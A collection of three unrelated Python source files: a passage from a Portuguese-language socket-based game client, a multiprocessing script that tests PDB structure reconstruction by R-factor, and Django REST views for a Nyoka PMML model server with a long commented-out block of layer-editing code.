for index in range(len(listUsers)):
try:
if(index>len(listUsers)): break
if(listUsers[index].login==dead):
listUsers[index].alive=False
listUsers[index].kills=dKills
listUsers[index].deaths=dDeaths
if(listUsers[index].login==killer):
listUsers[index].kills=kKills
listUsers[index].deaths=kDeaths
# listUsers.pop(index)
except Exception as error:
print("")
def delBullet(bID):
global listBullets
# print(len(listBullets))
for index in range(len(listBullets)):
try:
if(index>len(listBullets)): break
if(listBullets[index].id==bID):
listBullets.pop(index)
except Exception as error:
print("")
def newBullet(bullet):
global listBullets
position,id = bullet
b = createBullet(position,id)
listBullets.append(b)
def receiverNewUser(users):
global listUsers
listUsers=[]
for user in users:
# print("New user "+user._login,user._p,user._style)
personagem = User(user._p,user._style,user._alive,user._login)
listUsers.append(personagem)
def receiverUpdateMap(msg):
users,bullets = msg
for b in bullets:
position,id = b
for bullet in listBullets:
# print("b.id :",b)
# print("bullet update: "+bullet.id)
if(bullet.id==id):
bullet.position=position
for u in users:
position,login = u
for clientUser in listUsers:
# print("update login: "+clientUser.login)
if(clientUser.login==login):
# for p in clientUser.lastPosition:
# if(p!=position):
# clientUser.lastPosition.append(clientUser.p)
clientUser.login = login
clientUser.p = position
listActions=[]
newUserAction = createAction("newUser",receiverNewUser)
listActions.append(newUserAction)
userDeadAction = createAction("userDead",userDead)
listActions.append(userDeadAction)
userRebornAction = createAction("reborn",reborn)
listActions.append(userRebornAction)
updateMapAction = createAction("updateMap",receiverUpdateMap)
listActions.append(updateMapAction)
newBulletAction = createAction("newBullet",newBullet)
listActions.append(newBulletAction)
delBulletAction = createAction("delBullet",delBullet)
listActions.append(delBulletAction)
chatAction = createAction("chat",chat)
listActions.append(chatAction)
# socket_cliente.bind((IP,porta))
try:
print("MMORPG, ESSE É O NOME, É O QUE TÁ ESCRITO!")
l = input("Login: ")
p = input("Senha: ")
while True:
s = input("Digite uma letra para ser seu style: ")
if(s=="|"):
print("Este não é um estilo valido.")
elif(s=="*"):
print("Este não é um estilo valido.")
elif(s=="="):
print("Este não é um estilo valido.")
elif(s=="X"):
print("Este não é um estilo valido.")
else:
break
# IP_server = input("Entre com o endereço de IP do servidor: ")
MSG= ("on",("logando",l,p,s))
byte = pickle.dumps(MSG)
socket_cliente.connect((IP_server,porta_server))
thread_send = threading.Thread(target=sendMessage)
thread_send.start()
thread_receive = threading.Thread(target=receive)
thread_receive.start()
socket_cliente.send(byte)
startDrawing()
# rec=socket_cliente.recv(1024)
# print(rec)
except Exception as error:
print(str(error))
print("Algum erro foi gerado e sei lá! Ignore e provavelmente o erro suma com o tempo")
socket_cliente.close()
isRunning=False
isDrawing=False
sys.exit()
|
Test_reconstruction_queues.py
|
from __future__ import division
from misc_scripts.r_factor_calc import *
from iotbx.pdb.multimer_reconstruction import multimer
from multiprocessing import Process, Queue, Lock
from iotbx import pdb
import cPickle as pickle
import os
'''
Read list of pdb files names with more than one good BIOMT records
Read list of pdb files names with more than one good MTRIX records
Get coresponding structure factor files
@author: Youval Dar
'''
def Call_function(queue,lock):
'''
Collect the results from the parallel process and write them into files
Collect_tested_files : the file that lists all pdb files that were checked
files_with_problems : the files with all pdb files that had processing issues and r>=1
results are stored in files in the following format:
file_name1:r1:msg1
file_name2:r2:msg2
file_name3:r3:msg3
.
.
the r is the result of r_factor_calc.py
msg is the error or problem with the test, if there is one
'''
# append results from this run
f = open('/net/cci-filer2/raid1/home/youval/Work/work/Collect_tested_files','a')
g = open('/net/cci-filer2/raid1/home/youval/Work/work/files_with_problems','a')
while True:
# get items from the queue
x = queue.get()
# check if queue is empty
if x == 'DONE':
f.close()
g.close()
break
# if we are not DONE
# calculate the precent of difference of R-work reconstructed vs mtz data
[pdb_file,sf_file,file_name] = x
print 'Processing file {}'.format(file_name)
try:
r = r_factor_calc([pdb_file,sf_file],eps=2e-3,fromRCSB=False)
msg = 'OK'
except Sorry as e:
r = 100
msg = e.message
except TypeError as e:
r = 100
msg = e.message
# Write results to file
outString = '{0}:{1}:{2}\n'.format(file_name,r,msg)
lock.acquire()
if r<1:
f.write(outString)
print outString
else:
g.write(outString)
print outString
lock.release()
def make_dict(index_file_name,data_dir=''):
'''
Read all file names from PBP mirror folder, structure factor files
or other file containing file names
for PDB fils check the correct folder using os.environ["PDB_MIRROR_PDB"]
and the file name is 'INDEX'
for structure factor files use os.environ["PDB_MIRROR_STRUCTURE_FACTORS"]
and the file name 'INDEX'
input:
data_dir : the directory containing a file with the names of files we want to extract
index_file_name : file names list
Output:
a dictionary
{file_name: file_path,...}
'''
file_names = open(os.path.join(data_dir, index_file_name), "r").readlines()
result = {}
for file_path in file_names:
# file_path looks like: '/net/chevy/raid1/pdb_mirror/pdb/00/pdb100d.ent.gz'
# file_name should look like 'pdb100d'
file_path = file_path.strip()
file_name = file_path.split('/')[-1]
file_name = file_name.split('.')[0]
if file_name.startswith('pdb'):
# pdb file names in INDEX are like 'pdb2vpf', the file_name should be '2vpf'
file_name = file_name[3:]
elif file_name.startswith('r'):
# structure factor file names in INDEX are like 'r1oqjsf', it should be '1oqj'
file_name = file_name[1:-2]
else:
print 'File namming problems!!!'
print file_name
break
if file_path.startswith('/net'):
result[file_name] = file_path
else:
result[file_name] = data_dir+file_path
return result
def run():
'''
good_MTRIX_pdb_files, good_BIOMT_pdb_files and structure_factors_files
are dictionaries. the keys are pdb record name and the values are the
appropriate file full path
'''
# If you already have the dictionaries use:
good_MTRIX_pdb_files = pickle.load(open('dict_good_MTRIX_pdb_files','r'))
good_BIOMT_pdb_files = pickle.load(open('dict_good_BIOMT_pdb_files','r'))
structure_factors_files = pickle.load(open('dict_structure_factors_files','r'))
MTRIX_with_Straucture_Factor = pickle.load(open('MTRIX_with_Straucture_Factor_file_list','r'))
print 'Dictionaries are loaded...'
# run test - compare r-work fromreconstructed pdb file to that of the mtz data
print '*'*50
print 'Start testing MTRIX reconstruction testing'
print '*'*50
# Load previous results
reconstruction_test_dict = pickle.load(open('reconstruction_test_dict','r'))
reconstruction_test_list = pickle.load(open('reconstruction_test_list','r'))
# iterate over file and calculate qulity of R-work of reconstructed pdb file
# Test of all files in MTRIX_with_Straucture_Factor
# collect all good results and save them on a file so that
# not to repeat them
#tested_files = open('Collect_tested_files',"r").readlines()
tested_files = open('Collect_tested_files',"r").read().splitlines()
files_with_problems = open('files_with_problems',"r").read().splitlines()
# Clean the remarks - use only protein name
files_with_problems = [x[:4] for x in files_with_problems]
tested_files = [x[:4] for x in tested_files]
# start queue
queue = Queue()
lock = Lock()
reader_p = Process(target=Call_function, args=(queue,lock))
reader_p.daemon = True
reader_p.start()
for file_name in MTRIX_with_Straucture_Factor:
if (file_name not in tested_files) and (file_name not in files_with_problems):
pdb_file = good_MTRIX_pdb_files[file_name]
sf_file = structure_factors_files[file_name]
queue.put([pdb_file,sf_file,file_name])
queue.put('DONE')
# close the parallel process
reader_p.join() # wait for the reader to finish
# Analyze the results and add them to dictionaries
tested_files = open('Collect_tested_files',"r").read().splitlines()
for x in tested_files:
[file_name,r,msg] = x.split(':')
r = float(r)
reconstruction_test_dict[file_name] = r
reconstruction_test_list.append(r)
# save the results
pickle.dump(reconstruction_test_dict,open('reconstruction_test_dict','w'))
pickle.dump(reconstruction_test_list,open('reconstruction_test_list','w'))
print 'Done...'
if __name__=='__main__':
# move to working directory
os.chdir('/net/cci-filer2/raid1/home/youval/Work/work')
#os.chdir('c:\\Phenix\\Dev\\Work\\work')
# check how many processors are available
run()
|
views.py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from django.views.decorators.http import require_POST
from django.views.generic import View
import json
from datetime import datetime
from multiprocessing import Lock, Process
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.decorators import api_view,schema
import requests, json,sys,subprocess, typing
from nyokaserver import nyokaUtilities,nyokaPMMLUtilities
from nyoka import PMML43Ext as pml
from nyokaserver.nyokaServerClass import NyokaServer
from KerasModelSupport.views import KerasExecution,ONNXExecution
class PMMLView(APIView):
http_method_names=['get']
def dispatch(self,requests):
if requests.method=='GET':
result=self.get(requests)
else:
return JsonResponse({},status=405)
return result
def get(self,requests):
try:
filePath=requests.GET['filePath']
if not filePath:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
import pathlib
fO=pathlib.Path(filePath)
if fO.suffix == '.pmml':
print ('Came to PMML')
return NyokaServer.getDetailsOfPMML(filePath)
elif fO.suffix == '.h5':
return KerasExecution().getDetailsfromKerasModel(filePath)
elif fO.suffix == '.onnx':
return ONNXExecution().getDetailsfromOnnxModel(filePath)
class PMMLGlobalView(APIView):
http_method_names=['get']
def dispatch(self,requests):
if requests.method=='GET':
result=self.get(requests)
else:
return JsonResponse({},status=405)
return result
def get(self,requests):
return NyokaServer.getGlobalObject()
class PMMLOpeartionView(APIView):
http_method_names=['post']
def diapatch(self,requests,projectID):
if requests.mehtod=='POST':
result=self.post(requests,projectID)
else:
return JsonResponse({},status=405)
return result
def post(self,requests,projectID):
try:
filePath=requests.POST.get('filePath')
if not filePath:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
return NyokaServer.addArchitectureToGlobalMemoryDict(projectID,filePath)
class PMMLLayerView(APIView):
http_method_names=['put','delete']
def dispatch(self,requests,projectID):
if requests.method=='PUT':
result=self.put(requests,projectID)
elif requests.method=='DELETE':
result=self.delete(requests,projectID)
else:
return JsonResponse({},status=405)
return result
def delete(self,requests,projectID):
userInput = json.loads(requests.body)
try:
payload=userInput['layerDelete']
if not payload:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
if 'modelType' in payload:
if payload['modelType']== 'Workflow':
return NyokaServer.deleteWorkflowlayer(userInput,projectID)
else:
return NyokaServer.deletelayer(userInput,projectID)
def put(self,requests,projectID):
userInput = json.loads(requests.body)
try:
payload=userInput['layerToUpdate']
if not payload:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
if 'modelType' in payload:
if payload['modelType']== 'Workflow':
return NyokaServer.updatetoWorkflow(payload,projectID)
elif payload['modelType']== 'WorkflowBeta':
return NyokaServer.updatetoWorkflowBeta(payload,projectID)
else:
return NyokaServer.updatetoArchitecture(payload,projectID)
# from SwaggerSchema.schemas import (
# addArchitectureSwagger,
# updateLayerSwagger,
# deleteLayerSwagger,
# getDetailsOfPMMLswagger)
# nyokaUtilities = nyokaUtilities.NyokaUtilities()
# nyokaPMMLUtilities = nyokaPMMLUtilities.NyokaPMMLUtilities()
# global lockForPMML
# lockForPMML = None
# def create_lock():
# global lockForPMML
# lockForPMML = Lock()
# print(lockForPMML.__dir__())
# settingFilePath='./settingFiles/'
# savedModels='./SavedModels/'
# global MEMORY_DICT_ARCHITECTURE,MEMORY_OF_LAYERS
# MEMORY_DICT_ARCHITECTURE={}
# MEMORY_OF_LAYERS={}
# layerDetail=open(settingFilePath+'listOflayers.json','r')
# MEMORY_OF_LAYERS=json.loads(layerDetail.read())
# class NyokaServer:
# @csrf_exempt
# @api_view(['GET'])
# def listOfLayers(requests):
# global MEMORY_OF_LAYERS
# print('response sent')
# return JsonResponse(MEMORY_OF_LAYERS,safe=False)
# @csrf_exempt
# @api_view(['POST'])
# @schema(addArchitectureSwagger)
# def addArchitectureToGlobalMemoryDict(requests):
# global MEMORY_DICT_ARCHITECTURE
# projectID=requests.POST.get('projectID')
# filePath=requests.POST.get('filePath')
# try:
# MEMORY_DICT_ARCHITECTURE[projectID]
# except:
# MEMORY_DICT_ARCHITECTURE[projectID]={}
# try:
# print ('filePath >>>> ',filePath)
# archFromPMML=nyokaUtilities.pmmlToJson(filePath)
# print ('pass')
# MEMORY_DICT_ARCHITECTURE[projectID]['architecture']=archFromPMML
# except:
# MEMORY_DICT_ARCHITECTURE[projectID]['architecture']=[]
# #######################################################
# MEMORY_DICT_ARCHITECTURE[projectID]['filePath']=filePath
# MEMORY_DICT_ARCHITECTURE[projectID]['projectID']=projectID
# # print(MEMORY_DICT_ARCHITECTURE)
# print('response sent')
# return JsonResponse(MEMORY_DICT_ARCHITECTURE[projectID])
# def selectArchitecture(checkTemplateID):
# if checkTemplateID=='mobilenetArch':
# pmmlObj = pml.parse(open(settingFilePath+'MobilenetArch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'MobilenetArch.pmml')
# elif checkTemplateID=='vgg16Arch':
# pmmlObj = pml.parse(open(settingFilePath+'vGG16Arch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'vGG16Arch.pmml')
# elif checkTemplateID=='vgg19Arch':
# pmmlObj = pml.parse(open(settingFilePath+'vGG19Arch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'vGG19Arch.pmml')
# return templateArch,pmmlObj
# @csrf_exempt
# @api_view(["POST"])
# @schema(updateLayerSwagger)
# def updatetoArchitecture(requests):
# global lockForPMML
# print ('#######################################################################')
# global MEMORY_DICT_ARCHITECTURE, lockForPMML
# userInput=requests.body
# userInput=json.loads(userInput)
# payload=userInput['layerToUpdate']
# print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$",type(payload))
# tempGlobal=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]
# filetoSave=tempGlobal['filePath']
# existingArch=tempGlobal['architecture']
# oldLenOfArchitecture = len(existingArch)
# ####################################
# try:
# lockForPMML.acquire()
# existingPmmlObj=pml.parse(filetoSave,silence=True)
# except Exception as e:
# print('>>>>>>>>>>>>>>>>> ', str(e))
# existingPmmlObj=None
# finally:
# lockForPMML.release()
# newPmmlObj=None
# templatePmml=None
# if payload['itemType'] in ['FOLDING','DATA','CODE','TEMPLATE']:
# processTheInput=payload
# else:
# try:
# processTheInput=nyokaUtilities.addLayertoJson(payload)
# except:
# processTheInput=payload
# # print ('Ouput which we got >>>>>>>>>>> ',processTheInput)
# newArch=[]
# listOFIDS,listOFIndices,listOFIdIndex,listOfSectionID,listOFSectionIdIndex,listOFSectionIdAndId=nyokaUtilities.detailsofExistingArch(existingArch)
# listOfAllIDinSections=[]
# for j in existingArch:
# if j['itemType']=='FOLDING':
# for num,k in enumerate(j['children']):
# listOfAllIDinSections.append(k['id'])
# indexInObj=nyokaUtilities.checkIndexOfInput(processTheInput)
# idInObj=nyokaUtilities.getIdOfInput(processTheInput)
# itemTypeofObj=processTheInput['itemType']
# print ('Ouput itemTypeofObj we got >>>>>>>>>>> ',itemTypeofObj)
# # print ('nyokaUtilities.checkAboutLayer(processTheInput)',nyokaUtilities.checkAboutLayer(processTheInput))
# if len(existingArch) ==0:
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# print ('B1 Given input is of Type Template')
# checkTemplateID=processTheInput['templateId']
# # $update$
# templateArch,templatePmml=self.selectArchitecture(checkTemplateID)
# if indexInObj not in listOFIndices:
# existingArch=existingArch+templateArch
# else:
# existingArch=existingArch[:indexInObj]+templateArch+existingArch[indexInObj:]
# else:
# print ('A1 len of existingArch is 0')
# newArch.append(processTheInput.copy())
# existingArch=newArch.copy()
# elif len(existingArch)>0:
# #######################################################################################################################
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'Section':
# print ('A2 Given input is of Type Section')
# sectionIdOfInput=nyokaUtilities.getIdOfSection(processTheInput)
# tupleOFindexSect=[(i['layerIndex'],i['sectionId']) for i in existingArch if i['itemType']=='FOLDING']
# print ('>>>>>>>>>>>>>>>>>>> ',tupleOFindexSect)
# print ('<<<<<<<<<<<<<<<<<<<< ',indexInObj,sectionIdOfInput)
# if ((indexInObj,sectionIdOfInput) in tupleOFindexSect) & (nyokaUtilities.checkChildren(processTheInput) ==True):
# print ('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Came here')
# existingArch[indexInObj]=payload.copy()
# elif (sectionIdOfInput in listOfSectionID) and (sectionIdOfInput != None):
# print ('A3 Section Id exist ',sectionIdOfInput )
# listOfIDSwheretomove=[j['id'] for j in [i for i in existingArch if i['itemType']=='FOLDING' if i['sectionId']==sectionIdOfInput][0]['children']]
# indexOfObject=existingArch.index([j for j in [i for i in existingArch if nyokaUtilities.checkExistForSectionFilter(i)] if j['sectionId']==sectionIdOfInput][0])
# tempSection=existingArch[indexOfObject]
# sectionArch=tempSection['children']
# if idInObj in listOFIDS:
# try:
# toRem=[i['id'] for i in existingArch].index(idInObj)
# existingArch.remove(existingArch[toRem])
# except:
# pass
# # print ('$$$$$$$$$$$$',[i['id'] for i in existingArch])
# tempSectionArch=[]
# if len(sectionArch)==0:
# print ('A4 Section Id exist and No elment in children hence adding',sectionIdOfInput,idInObj )
# tempSectionArch.append(processTheInput.copy())
# tempSection['children']=tempSectionArch
# elif len(sectionArch)>0:
# sectionListOFIDS,sectionListOFIndices,sectionListOFIdIndex=nyokaUtilities.detailsofSectionArch(tempSection)
# print ('A5 Section Id exist there are element in children hence checking What to do',sectionIdOfInput,idInObj )
# if idInObj in listOFIDS:
# print ('A6_0 element Id exist',idInObj )
# if (sectionIdOfInput,indexInObj,idInObj) in listOFSectionIdIndex:
# print ('A6 Section Id Index and object Id matched just update',sectionIdOfInput,indexInObj,idInObj )
# existingArch[indexOfObject]['children'][indexInObj]=processTheInput.copy()
# elif (sectionIdOfInput,idInObj) in listOFSectionIdAndId:
# if indexInObj in sectionListOFIndices:
# print ('A7 Index {} exist alrady need to swap and reorder'.format(indexInObj))
# tempIndExist=[j['id'] for j in sectionArch].index(idInObj)
# del sectionArch[tempIndExist]
# sectionArch.insert(indexInObj,processTheInput.copy())
# for num,lay in enumerate(sectionArch):
# lay['layerIndex']=num
# newArch.append(lay)
# existingArch[indexOfObject]['children']=newArch.copy()
# elif idInObj not in listOfAllIDinSections:
# print ('A70 Index exist but not in section need to add')
# # print (idInObj,[i['id'] for i in existingArch])
# if idInObj in [i['id'] for i in existingArch]:
# print ('A701 Index exist but not in section probably section is empty')
# toDel=[i['id'] for i in existingArch].index(idInObj)
# existingArch.remove(existingArch[toDel])
# newSecArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# sectionArch=newSecArch.copy()
# else:
# # print (listOFSectionIdAndId)
# toremoveFromSection=[j[0] for j in listOFSectionIdAndId if j[0]==sectionIdOfInput][0]
# indexOfsectionInArch=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==toremoveFromSection][0])
# # toDel=[i['id'] for i in existingArch].index(idInObj)
# # existingArch.remove(existingArch[toDel])
# print ('A702 Index section not empty')
# if indexInObj in [i['layerIndex'] for i in sectionArch]:
# print ('A703 Index section not empty')
# sectionArch.insert(processTheInput.copy(),indexInObj)
# else:
# print ('A704 Index section not empty')
# sectionArch.append(processTheInput.copy())
# print ([i['id'] for i in sectionArch])
# existingArch[indexOfsectionInArch]['children']=sectionArch
# # print ([i['id'] for i in existingArch])
# elif idInObj not in listOfIDSwheretomove:
# print ('A7_1 the id exist but not in section so deleting and appending')
# toremoveFromSection=[j[0] for j in listOFSectionIdAndId if j[1]==idInObj][0]
# indexOfsectionInArch=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==toremoveFromSection][0])
# indexOfObjecttoremove=[j['id'] for j in existingArch[indexOfsectionInArch]['children']].index(idInObj)
# toremoveFromSection,indexOfsectionInArch,indexOfObjecttoremove
# del existingArch[indexOfsectionInArch]['children'][indexOfObjecttoremove]
# tempStrucOfChildList=[]
# for num,elem in enumerate(existingArch[indexOfsectionInArch]['children']):
# tempStrucOfChild=elem.copy()
# tempStrucOfChild['layerIndex']=num
# tempStrucOfChildList.append(tempStrucOfChild)
# existingArch[indexOfsectionInArch]['children']=tempStrucOfChildList.copy()
# newArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# existingArch[indexOfObject]['children']=newArch
# else:
# print ('A8 Section Id exist there are element and new element has came figure out the place',sectionIdOfInput,idInObj )
# if indexInObj in sectionListOFIndices:
# print ('>>>>>>>>>> Section Id exist > 0 but ID is not fiund but Index has ben found',sectionIdOfInput,idInObj )
# newArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# existingArch[indexOfObject]['children']=newArch.copy()
# else:
# sectionArch.append(processTheInput)
# existingArch[indexOfObject]['children']=sectionArch.copy()
# #3####################################################################################################################
# else:
# print ('A9 Id does not exist ',idInObj )
# if indexInObj in listOFIndices:
# print ('A10 Index {} exist alrady'.format(indexInObj))
# newArch=nyokaUtilities.makeModification(existingArch,processTheInput)
# existingArch=newArch.copy()
# else:
# print ('A11 Id does not exist nor the index ',idInObj )
# existingArch.append(processTheInput.copy())
# elif nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# print ('B1 Given input is of Type Template')
# checkTemplateID=processTheInput['templateId']
# templateArch, templatePmml=self.selectArchitecture(checkTemplateID)
# if indexInObj not in listOFIndices:
# existingArch=existingArch+templateArch
# else:
# existingArch=existingArch[:indexInObj]+templateArch+existingArch[indexInObj:]
# else:
# print ('A11 Given input is of Type Layer')
# print ('A12 len of existingArch is > 0')
# if idInObj in listOFIDS:
# print ('A13 Id exist ',idInObj )
# if (indexInObj,idInObj) in listOFIdIndex:
# print ('The layer already exist and index also matches and just needed to be updated')
# for lay in existingArch:
# indexLay=nyokaUtilities.checkIndexOfInput(lay)
# idInLay=nyokaUtilities.getIdOfInput(lay)
# if (indexInObj,idInObj) ==(indexLay,idInLay):
# print ('A13 Id exist processTheInput')
# newArch.append(processTheInput.copy())
# else:
# newArch.append(lay)
# existingArch=newArch.copy()
# else:
# print ('The layer already exist but index has changed needed to be restructre')
# print ('listOFIndices',listOFIndices)
# print ('indexInObj',indexInObj)
# if indexInObj in listOFIndices:
# print ('A14 Index {} exist alrady need to swap and reorder'.format(indexInObj))
# tempIndExist=[j['id'] for j in existingArch].index(idInObj)
# del existingArch[tempIndExist]
# print (len(existingArch))
# existingArch.insert(indexInObj,processTheInput.copy())
# for num,lay in enumerate(existingArch):
# lay['layerIndex']=num
# newArch.append(lay)
# existingArch=newArch.copy()
# else:
# groupwithID=[]
# for j in existingArch:
# if j['itemType']=='FOLDING':
# for num,k in enumerate(j['children']):
# groupwithID.append((j['id'],k['id'],num))
# sectionToRemove=[j for j in groupwithID if j[1]==idInObj][0]
# indexOfSectoDel=[i['id'] for i in existingArch].index(sectionToRemove[0])
# tempSecToremoveFrom=existingArch[indexOfSectoDel]['children'].copy()
# for tem in tempSecToremoveFrom:
# if tem['id']==idInObj:
# tempSecToremoveFrom.remove(tem)
# for numa,tem2 in enumerate(tempSecToremoveFrom):
# tem2['layerIndex']=numa
# existingArch[indexOfSectoDel]['children']=tempSecToremoveFrom
# existingArch.append(processTheInput.copy())
# else:
# print ('A15 Id does not exist ',idInObj )
# if indexInObj in listOFIndices:
# print ('A16 Index {} exist alrady'.format(indexInObj))
# newArch=nyokaUtilities.makeModification(existingArch,processTheInput)
# existingArch=newArch.copy()
# else:
# existingArch.append(processTheInput.copy())
# for num,coco in enumerate(existingArch):
# if coco['itemType']=='FOLDING':
# for num2,k in enumerate(coco['children']):
# k['layerIndex']=num2
# coco['layerIndex']=num
# else:
# coco['layerIndex']=num
# tempGlobal['architecture']=existingArch
# indexToUpdate = payload['layerIndex']
# indexInPmml = 0
# foundTheLayer = False
# if not existingPmmlObj or len(existingPmmlObj.DeepNetwork[0].NetworkLayer)==0:
# indexInPmml = 0
# else:
# prevId = ''
# import ast
# for idx,layer in enumerate(existingPmmlObj.DeepNetwork[0].NetworkLayer):
# if indexInPmml == indexToUpdate:
# indexInPmml = idx
# foundTheLayer = True
# break
# if not layer.Extension:
# indexInPmml += 1
# else:
# secId = ast.literal_eval(layer.Extension[0].value)['sectionId']
# if secId != prevId:
# indexInPmml += 1
# prevId = secId
# if not foundTheLayer:
# indexInPmml = len(existingPmmlObj.DeepNetwork[0].NetworkLayer)
# else:
# if existingPmmlObj.Header.Extension:
# indexInPmml -= 1
# if existingPmmlObj.script:
# indexInPmml -= 1
# print('$$$$$$$$$$$$$$$$$',indexInPmml)
# # create the PMML for the newly updated architecture
# newPmmlObj = nyokaPMMLUtilities.getPmml(existingArch)
# # if template is picked then check if existing pmml already has some layers or not
# if templatePmml:
# if len(templatePmml.DeepNetwork[0].NetworkLayer) == len(newPmmlObj.DeepNetwork[0].NetworkLayer):
# for idx,lay in enumerate(newPmmlObj.DeepNetwork[0].NetworkLayer):
# templatePmml.DeepNetwork[0].NetworkLayer[idx].Extension = lay.Extension
# else:
# diff = len(newPmmlObj.DeepNetwork[0].NetworkLayer) - len(templatePmml.DeepNetwork[0].NetworkLayer)
# for idx in range(len(templatePmml.DeepNetwork[0].NetworkLayer)):
# templatePmml.DeepNetwork[0].NetworkLayer[idx].Extension = newPmmlObj.DeepNetwork[0].NetworkLayer[idx+diff].Extension
# newPmmlObj.DeepNetwork = templatePmml.DeepNetwork
# layerIdsInPmml = list()
# for lay in existingPmmlObj.DeepNetwork[0].NetworkLayer:
# layerIdsInPmml.append(lay.layerId)
# # print(payload['itemType'], payload['layerId'], layerIdsInPmml)
# # if the update is for code or data then do not change the deep network
# if payload['itemType'] in ['DATA','CODE']:
# pass
# # if updated layer is already present then update the layer only
# elif str(payload['layerId']) in layerIdsInPmml:
# indexInPmml = layerIdsInPmml.index(str(payload['layerId']))
# print(indexInPmml)
# print(existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml].__dict__)
# existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml] = newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml]
# # if new layer and index is out of bound then add to the last
# elif indexInPmml >= len(newPmmlObj.DeepNetwork[0].NetworkLayer):
# if existingPmmlObj:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer+\
# newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# else:
# existingPmmlObj = newPmmlObj
# # if new layer and within index range then insert it there
# else:
# if templatePmml:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer[:indexInPmml]+\
# newPmmlObj.DeepNetwork[0].NetworkLayer+existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# else:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer[:indexInPmml]+\
# [newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml]]+existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# newPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer
# newPmmlObj.DeepNetwork[0].numberOfLayers = len(newPmmlObj.DeepNetwork[0].NetworkLayer)
# if newPmmlObj.Header.Extension:
# newPmmlObj.Header.Extension[0].anytypeobjs_ = ['']
# for lay in newPmmlObj.DeepNetwork[0].NetworkLayer:
# if lay.Extension:
# lay.Extension[0].anytypeobjs_ = ['']
# try:
# lockForPMML.acquire()
# newPmmlObj.export(open(filetoSave,'w'),0)
# finally:
# lockForPMML.release()
# # train_prc = Process(target=nyokaPMMLUtilities.writePMML,args=(existingArch,filetoSave))
# # train_prc.start()
# # # print (MEMORY_DICT_ARCHITECTURE)
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# returntoClient={'projectID':userInput['projectID'],'architecture':tempGlobal['architecture']}
# else:
# returntoClient={'projectID':userInput['projectID'],'layerUpdated':processTheInput}
# print('response sent')
# return JsonResponse(returntoClient)
# def writePmml(self,pmmlObj, filepath, lockForPMML):
# try:
# lockForPMML.acquire()
# pmmlObj.export(open(filepath,'w'),0)
# print('>>>>>>>>>>>, PMML written')
# except Exception as e:
# print('>>>>>>>>>>>> ',str(e))
# finally:
# lockForPMML.release()
# @csrf_exempt
# @api_view(['POST'])
# @schema(deleteLayerSwagger)
# def deletelayer(requests):
# userInput=requests.body
# userInput=json.loads(userInput)
# global MEMORY_DICT_ARCHITECTURE
# global lockForPMML
# print ('>>>>>',userInput)
# existingArch=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['architecture']
# # $update$
# filetoSave=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['filePath']
# try:
# lockForPMML.acquire()
# existingPmmlObj=pml.parse(filetoSave,silence=True)
# except Exception as e:
# print('>>>>>>>>>>>>>>>>> ', str(e))
# existingPmmlObj=None
# finally:
# lockForPMML.release()
# existingPmmlObj=pml.parse(filetoSave, silence=True)
# layerIdToDelete=userInput['layerDelete']['layerId']
# processTheInput=userInput['layerDelete']
# try:
# deleteFromSection=processTheInput['sectionId']
# if processTheInput['itemType']!='FOLDING':
# idToDelete=processTheInput['id']
# positionOfSection=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==deleteFromSection][0])
# positionInChildren=[j['id'] for j in existingArch[positionOfSection]['children']].index(idToDelete)
# del existingArch[positionOfSection]['children'][positionInChildren]
# else:
# positionOfSection=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==deleteFromSection][0])
# del existingArch[positionOfSection]
# except:
# idToDelete=processTheInput['id']
# positionInArch=[j['id'] for j in existingArch].index(idToDelete)
# del existingArch[positionInArch]
# for num,lay in enumerate(existingArch):
# if lay['itemType']=='FOLDING':
# for num2,levLay in enumerate(lay['children']):
# levLay['layerIndex']=num2
# else:
# lay['layerIndex']=num
# # $update$
# indexToDelete = -1
# for index, layer in enumerate(existingPmmlObj.DeepNetwork[0].NetworkLayer):
# print("**********************************",layer.layerId)
# if layer.layerId == layerIdToDelete:
# indexToDelete = index
# break
